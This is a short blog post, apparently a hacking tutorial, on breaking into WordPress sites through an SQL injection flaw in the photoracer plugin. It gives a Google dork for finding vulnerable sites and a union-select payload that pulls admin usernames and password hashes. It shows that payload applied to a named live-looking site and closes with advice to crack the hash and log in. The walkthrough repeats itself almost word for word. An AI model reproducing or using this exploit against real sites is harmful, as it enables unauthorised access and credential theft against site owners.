Hi here i tell you how to hack wordpress site with easy way i will use exploit to hack sites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
![[Image: asdmr.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sij09QgG82zY0aZrv3GVCCyLtRP7p2Z5b7nGdQ8ZhxR7wy5tzsUcySx8f9clJutUnitksoazKKQHLAA_Pa1K1T-3bo8BWDQooixK8RA6LY_MC4QVo=s0-d)
and i'm gonna test 1 of them for ex this find in google
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
and i'm gonna test 1 of them for ex this find in google
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php
Labels:
Sql injections,
Website hacking
Previous Article
Responses
0 Respones to "How to hack Wordpress website with Phototrace SQLi vulnerability"
Post a Comment